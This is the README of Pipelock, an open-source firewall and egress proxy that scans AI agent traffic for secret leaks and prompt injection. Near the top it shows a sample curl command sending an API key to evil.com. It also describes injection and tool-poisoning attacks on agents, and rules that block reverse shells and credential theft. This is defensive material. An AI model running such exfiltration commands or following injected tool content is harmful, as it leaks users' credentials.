Pipelock

Open-source AI agent firewall with mediator-signed action receipts from outside the agent trust boundary. Network scanning, process containment, MCP-aware policy enforcement, and independently verifiable proof of what your agent did in a single binary. Learn more: Open-source AI firewall.

Agent-external attestation built in. Receipts are signed by the mediator, outside the agent process and outside its credentials, so evidence does not depend on the agent attesting to itself.

Covers MCP security, agent egress security, DLP for AI agents, and prompt injection defense. Pipelock acts as an agent egress proxy for outbound HTTP, WebSocket, and MCP traffic, with bidirectional MCP scanning, 48 credential patterns, and 25 injection patterns with 6-pass normalization.

Works with: Claude Code · Cursor · VS Code · JetBrains · OpenAI Agents SDK · Google ADK · AutoGen · CrewAI · LangGraph

Quick Start · What It Does · Docs · Blog · Ask Dosu

The Problem

Your AI agent has $ANTHROPIC_API_KEY in its environment, plus shell access. One request is all it takes:

curl "https://evil.com/steal?key=$ANTHROPIC_API_KEY"   # game over, unless pipelock is watching

Every machine action your agent takes (HTTP requests, tool calls, browser sessions) crosses a boundary between your secrets and the open internet. Pipelock sits at that boundary. It scans every outbound and inbound request, blocks exfiltration and injection, sandboxes the agent process, and generates signed evidence of what happened.

Quick Start

# Install
brew install luckyPipewrench/tap/pipelock

# Set up (discovers IDE configs, generates config, verifies detection)
pipelock init

# Test it
pipelock check --url "https://example.com/?key=EXAMPLE-SECRET-VALUE-1234"  # blocked
pipelock check --url "https://docs.python.org/3/"                            # allowed

# Download a binary (no dependencies)
# See https://github.com/luckyPipewrench/pipelock/releases

# Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest

# From source (requires Go 1.25+)
go install github.com/luckyPipewrench/pipelock/cmd/pipelock@latest

gh attestation verify pipelock_*_linux_amd64.tar.gz --owner luckyPipewrench
gh attestation verify oci://ghcr.io/luckypipewrench/pipelock:<version> --owner luckyPipewrench

What It Does

Pipelock is an AI egress proxy and MCP security control: it sits inline between your AI agent and the network, scans outbound and inbound traffic, and emits signed receipts plus mediation metadata for independent attestation.

11-Layer URL Scanner

Every request passes through: scheme validation, CRLF injection detection, path traversal blocking, domain blocklist, DLP pattern matching (48 built-in patterns for API keys, tokens, credentials, cryptocurrency keys, environment variable secrets, and financial identifiers with checksum validation), path entropy analysis, subdomain entropy analysis, SSRF protection with DNS rebinding prevention, per-domain rate limiting, URL length limits, and per-domain data budgets.

DLP runs before DNS resolution, designed to catch secrets before any DNS query leaves the proxy. BIP-39 seed phrase detection uses a dedicated scanner with dictionary lookup, sliding window matching, and SHA-256 checksum validation to catch cryptocurrency mnemonic exfiltration across all transport surfaces.

See docs/bypass-resistance.md for the full evasion test matrix.

Process Sandbox

Unprivileged process containment using OS-native kernel primitives. On Linux: Landlock LSM restricts filesystem access, seccomp filters dangerous syscalls, and network namespaces force all traffic through pipelock's scanner (no direct egress). On macOS: sandbox-exec profiles restrict filesystem and network. In containers, use --best-effort for Landlock + seccomp containment when namespace creation is restricted (network scanning uses proxy-based routing instead of kernel enforcement).

pipelock sandbox --config pipelock.yaml -- python agent.py
pipelock sandbox --best-effort -- python agent.py  # containers
pipelock mcp proxy --sandbox --config pipelock.yaml -- npx server

Response Scanning

Fetched content is scanned for prompt injection and state/control poisoning before reaching the agent. A 6-pass normalization pipeline catches zero-width character evasion, homoglyph substitution, leetspeak encoding, and base64-wrapped payloads. 25 built-in patterns cover jailbreak phrases, instruction manipulation, credential solicitation, memory persistence, preference poisoning, covert action directives, model instruction boundaries, and CJK-language instruction overrides. Actions: block, strip, warn, or ask (human-in-the-loop terminal approval).

text/event-stream responses (OpenAI chat completions, Anthropic messages, Kilo Gateway, MCP HTTP/SSE) stream through with per-event DLP and injection scanning so token-by-token LLM chat UX is preserved while body scanning stays on. Clean events flush immediately; a detection terminates the stream fail-closed. Compressed SSE streams are rejected since compressed bytes evade regex matching. See SSE streaming guide.

Request Redaction

Optional request-side redaction rewrites matched JSON values before they leave the agent. The same matcher covers HTTP request bodies, outbound WebSocket client messages, and MCP tools/call params.arguments across stdio, HTTP/SSE, and WebSocket transports. Replacements are typed placeholders such as <pl:aws-access-key:1>, and signed action receipts record only the active profile plus per-class counts.

MCP Proxy

Wraps any MCP server with bidirectional scanning. Three transport modes: stdio subprocess wrapping, Streamable HTTP bridging, and HTTP reverse proxy. Scans both directions: client requests checked for DLP leaks, server responses scanned for injection, and tools/list responses checked for poisoned descriptions and mid-session rug-pull changes.

# Wrap a local MCP server (stdio)
pipelock mcp proxy --config pipelock.yaml -- npx -y @modelcontextprotocol/server-filesystem /tmp

# Proxy a remote MCP server (HTTP)
pipelock mcp proxy --upstream http://localhost:8080/mcp

# Combined mode (fetch/forward proxy + MCP on separate ports)
pipelock run --config pipelock.yaml --mcp-listen 0.0.0.0:8889 --mcp-upstream http://localhost:3000/mcp

MCP Tool Policy

Pre-execution rules that block dangerous tool calls before they reach MCP servers. Ships with 17 built-in rules covering destructive operations, credential access, reverse shells, persistence mechanisms, and encoded command execution. Shell obfuscation detection is built-in. v2.0 adds a redirect action that routes dangerous operations through audited wrappers instead of blocking outright.

Tool Call Chain Detection

Detects attack patterns in sequences of MCP tool calls. Ships with 10 built-in patterns covering reconnaissance, credential theft, data staging, persistence, and exfiltration chains. Uses subsequence matching with configurable gap tolerance, so inserting innocent calls between attack steps doesn't evade detection.

Kill Switch

Emergency deny-all with four independent activation sources: config file, SIGUSR1, sentinel file, and remote API. Any one active blocks all traffic. The API can run on a separate port so agents can't deactivate their own kill switch.

# Activate from operator machine
curl -X POST http://localhost:9090/api/v1/killswitch \
  -H "Authorization: Bearer TOKEN" -d '{"active": true}'

Scan API

Evaluation endpoint for programmatic scanning. Any tool, pipeline, or control plane can submit URLs, text, or tool calls and get a structured verdict back (the proxy doesn't need to be in the request path). Four scan kinds: url, dlp, prompt_injection, and tool_call. Returns findings with scanner type, rule ID, and severity. Bearer token auth, per-token rate limiting, and Prometheus metrics.

See docs/scan-api.md for the full API reference.

Address Protection

Detects blockchain address poisoning attacks where a lookalike address is substituted for a legitimate one. Validates addresses for ETH, BTC, SOL, and BNB chains, compares against a user-supplied allowlist, and flags similar addresses using prefix/suffix fingerprinting. Designed for agents that interact with DeFi protocols or execute transactions.

Filesystem Sentinel

Monitors agent working directories for secrets written to disk. When an MCP subprocess writes a file containing credentials, pipelock detects it using the same DLP patterns applied to network traffic. On Linux, process lineage tracking attributes file writes to the agent's process tree. See docs/guides/filesystem-sentinel.md.

Event Emission

Forward audit events to external systems (SIEM, webhook receivers, syslog). Events are fire-and-forget and never block the proxy. Each event includes a MITRE ATT&CK technique ID where applicable (T1048 for exfiltration, T1059 for injection, T1195.002 for supply chain).

See docs/guides/siem-integration.md for log schema, forwarding patterns, and example SIEM queries.

Security Assessment

pipelock assess runs a four-stage security assessment against your deployment: attack simulation (20 scenarios across DLP, injection, tool poisoning, and URL evasion), config audit (12 categories scored 0-100), deployment verification (live probe of scanning and containment), and MCP server discovery (protection status across Claude Code, Cursor, VS Code, and other clients).

Critical exposures like unprotected MCP servers cap the grade regardless of numeric score.

pipelock assess init --config pipelock.yaml
pipelock assess run assessment-a1b2c3d4/
pipelock assess finalize assessment-a1b2c3d4/

The free summary shows your grade, section scores, and top findings. Licensed users get the full report with server-specific findings, remediation commands, and Ed25519-signed evidence.

Flight Recorder

Hash-chained JSONL evidence log with Ed25519-signed checkpoints and DLP redaction. Every proxy decision is recorded as a tamper-evident entry linked to the previous one. Action receipts provide cryptographically signed proof of each mediated action (what happened, what the verdict was, which policy was active), and request-side rewrites add a compact redaction summary block instead of storing plaintext secrets. Verify any receipt independently with pipelock verify-receipt.

Canary Tokens

Synthetic secrets injected into the agent's environment. If pipelock detects a canary in outbound traffic, it proves the agent (or something in its chain) is exfiltrating environment variables. Ships with pipelock canary to generate config snippets.

More Features

How It Works

Pipelock uses capability separation: the agent process has secrets but no direct network access. Pipelock has network access but no agent secrets. Even if the agent gets prompt-injected, it can't reach the firewall's controls.

Three HTTP proxy modes (same port), plus dedicated MCP and A2A proxies:

• Fetch proxy (/fetch?url=...): Fetches the URL, extracts text, scans for injection, returns clean content.
• Forward proxy (HTTPS_PROXY): Standard HTTP CONNECT tunneling. Zero code changes. Optional TLS interception for full payload scanning.
• WebSocket proxy (/ws?url=ws://...): Bidirectional frame scanning with DLP + injection detection.
• MCP proxy (pipelock mcp proxy): Wraps stdio or HTTP MCP servers with bidirectional scanning.
• A2A proxy: Inspects Google Agent-to-Agent protocol traffic.

flowchart LR
    subgraph PRIV["PRIVILEGED ZONE"]
        Agent["AI Agent\nAPI keys + credentials + source code\nNetwork-isolated by deployment"]
    end

    subgraph FW["FIREWALL ZONE"]
        Proxy["Pipelock\n11-layer scanner pipeline\nNo agent secrets"]
    end

    subgraph NET["INTERNET"]
        Web["APIs + MCP Servers + Web"]
    end

    Agent -- "fetch / CONNECT / ws / MCP / A2A" --> Proxy
    Proxy -- "scanned request" --> Web
    Web -- "response" --> Proxy
    Proxy -- "scanned content" --> Agent

    style PRIV fill:#2d1117,stroke:#f85149,color:#e6edf3
    style FW fill:#0d2818,stroke:#3fb950,color:#e6edf3
    style NET fill:#0d1b2e,stroke:#58a6ff,color:#e6edf3
    style Agent fill:#1a1a2e,stroke:#f85149,color:#e6edf3
    style Proxy fill:#0d2818,stroke:#3fb950,color:#e6edf3
    style Web fill:#0d1b2e,stroke:#58a6ff,color:#e6edf3

┌──────────────────────┐         ┌───────────────────────┐
│  PRIVILEGED ZONE     │         │  FIREWALL ZONE        │
│                      │         │                       │
│  AI Agent            │  IPC    │  Pipelock             │
│  - Has API keys      │────────>│  - No agent secrets   │
│  - Has credentials   │ fetch / │  - Full internet      │
│  - Restricted network│ CONNECT │  - Returns text       │
│                      │ /ws/MCP │  - WS frame scanning  │
│                      │<────────│  - URL scanning       │
│                      │ content │  - Audit logging      │
│                      │         │                       │
└──────────────────────┘         └───────────────────────┘

Security Matrix

Pipelock runs in three modes:

For agents running uncensored or abliterated models (e.g. OBLITERATUS), the hostile-model preset layers additional defenses on top of strict mode: aggressive entropy thresholds (3.0), blanket network tool blocking, session binding, cross-request exfiltration detection, and a pre-configured kill switch. pipelock audit recommends this preset when it detects known guardrail-removal toolchains (currently dependency-based detection).

What each mode prevents, detects, or logs:

Honest assessment: Strict mode blocks all outbound HTTP except allowlisted API domains, so there's no exfiltration channel through the proxy. Balanced mode raises the bar from "one curl command" to "sophisticated pre-planned attack." Audit mode gives you visibility you don't have today. With the sandbox enabled (pipelock sandbox), pipelock adds OS-level containment (Landlock + network namespaces + seccomp) on top of content inspection. The agent can't bypass the proxy because it has no direct network access.

Configuration

Generate a config from one of three CLI presets, or let pipelock audit tailor one to your project:

pipelock generate config --preset balanced > pipelock.yaml
pipelock audit ./my-project -o pipelock.yaml

Four additional preset files ship in configs/ for specific workflows:

Config changes are picked up automatically via file watcher or SIGHUP. Full reference: docs/configuration.md

For false positive tuning: docs/false-positive-tuning.md

Integration Guides

• Claude Code: MCP proxy setup, .claude.json configuration
• OpenAI Codex: MCP proxy wrapping, forward proxy, sandbox integration
• OpenAI Agents SDK: MCPServerStdio, multi-agent handoffs
• Google ADK: McpToolset, StdioConnectionParams
• AutoGen: StdioServerParams, mcp_server_tools()
• CrewAI: MCPServerStdio wrapping, MCPServerAdapter
• LangGraph: MultiServerMCPClient, StateGraph
• JetBrains/Junie: MCP proxy wrapping for IntelliJ, PyCharm, GoLand (walkthrough)
• Cursor: use configs/cursor.yaml with the same MCP proxy pattern as Claude Code (walkthrough)
• OpenClaw: Gateway sidecar, init container, config wrapping

Deployment

# Docker
docker pull ghcr.io/luckypipewrench/pipelock:latest
docker run -p 8888:8888 -v ./pipelock.yaml:/config/pipelock.yaml:ro \
  ghcr.io/luckypipewrench/pipelock:latest \
  run --config /config/pipelock.yaml --listen 0.0.0.0:8888

# Network-isolated agent (Docker Compose)
pipelock generate docker-compose --agent claude-code -o docker-compose.yaml
docker compose up

# Kubernetes (Helm)
helm install pipelock charts/pipelock/

Production recipes (Docker Compose with network isolation, Kubernetes sidecar + NetworkPolicy, iptables/nftables, macOS PF): docs/guides/deployment-recipes.md

CI Integration

# .github/workflows/pipelock.yaml
- uses: luckyPipewrench/pipelock@v2
  with:
    scan-diff: 'true'
    fail-on-findings: 'true'

Downloads a pre-built binary, runs pipelock audit, scans the PR diff for leaked secrets, and uploads the audit report as a workflow artifact. See examples/ci-workflow.yaml for a complete workflow.

Runnable demo: tool-response injection

The examples/tool-response-injection/ harness runs an end-to-end demo where an MCP tool with a harmless name and description hides a prompt-injection payload in its response. Pipelock blocks the response before it reaches the agent and emits signed action receipts that a third party can verify. The same demo runs against three transports with one shared signing key:

• MCP stdio (subprocess wrapping)
• MCP HTTP upstream (stdio-to-HTTP bridge)
• MCP HTTP reverse proxy

cd examples/tool-response-injection
python3 demo.py    # needs python3 + cryptography + pipelock on PATH

Community Rules

Signed rule bundles add detection patterns beyond the 48 built-in defaults. 28 community rules across DLP, injection, and tool-poison categories:

pipelock rules install pipelock-community

See docs/rules.md for details.

Comparison

Reference matrix: docs/comparison.md

Canonical comparison hub: AI runtime security comparison

Docs

Project Structure

cmd/pipelock/          CLI entry point
internal/
  cli/                 20+ Cobra commands (run, check, init, generate, mcp, session, posture, rules, ...)
    session/           `pipelock session` operator CLI — airlock inspection and recovery
    setup/             `pipelock init sidecar` — companion-proxy manifest generation (K8s)
  config/              YAML config, validation, defaults, hot-reload (fsnotify)
  scanner/             11-layer URL scanning pipeline + response injection detection
  audit/               Structured JSON logging (zerolog) + event emission dispatch
  proxy/               HTTP proxy: fetch, forward (CONNECT), WebSocket, DNS pinning, TLS
  mcp/                 MCP proxy + bidirectional scanning + tool poisoning + chains
  discover/            IDE/agent config discovery (Claude Code, Cursor, VS Code, JetBrains)
  killswitch/          Emergency deny-all (4 sources) + port-isolated API
  envelope/            Mediation envelope (RFC 8941) for sideband metadata
  media/               Image metadata stripping (JPEG/PNG byte-level surgery)
  normalize/           6-pass text normalization (NFKC + invisible + leetspeak + vowel + stego strip)
  receipt/             Action receipt signing + hash-chained evidence
  posture/             Posture capsule schema, signing, scoring, verify policy
  session/             Session state, taint classification, task boundaries, trust overrides
  rules/               Bundle loader, tier taxonomy, RequiredFeatures enforcement
  sandbox/             Landlock, seccomp, netns, macOS sandbox-exec
  shield/              Airlock, browser shield, SVG hardening
  signing/             Ed25519 key management
  integrity/           SHA256 file integrity monitoring
  report/              HTML/JSON audit report generation
enterprise/            Multi-agent features (ELv2)
sdk/conformance/       Cross-implementation receipt verification test vectors
charts/                Helm chart for Kubernetes deployment
configs/               7 preset config files
docs/                  Guides, references, compliance mappings

Testing

Pipelock is tested like a security product. The open-source core has thousands of unit, integration, and end-to-end tests. A separate private adversarial suite exercises real-world attack classes against the production binary. Every bypass graduates into a regression test before release.

Run make test to verify locally. Independent benchmark: the public agent-egress-bench corpus. See the live results.

Credits

• Architecture influenced by Anthropic's Claude Code sandboxing and sandbox-runtime
• Threat model informed by OWASP Agentic AI Top 10
• See docs/comparison.md for how Pipelock relates to other tools in this space
• Security review contributions from Dylan Corrales

Contributions welcome. See CONTRIBUTING.md for guidelines.

If Pipelock is useful, please star this repository. It helps others find the project.

License

Pipelock core is licensed under the Apache License 2.0. Copyright 2026 Joshua Waldrep.

Multi-agent features (per-agent identity, budgets, and configuration isolation) are in the enterprise/ directory, gated by the enterprise build tag and licensed under the Elastic License 2.0 (ELv2). These features activate with a valid license key.

The open-source core works independently without paid features. All scanning, detection, and single-agent protection is free.

Pre-built release artifacts (Homebrew, GitHub releases, Docker images) include paid-tier code that activates with a valid license key. Building from source with go install or the repository Dockerfile produces a Community-only binary.

See LICENSE for the Apache 2.0 text and enterprise/LICENSE for the ELv2 text.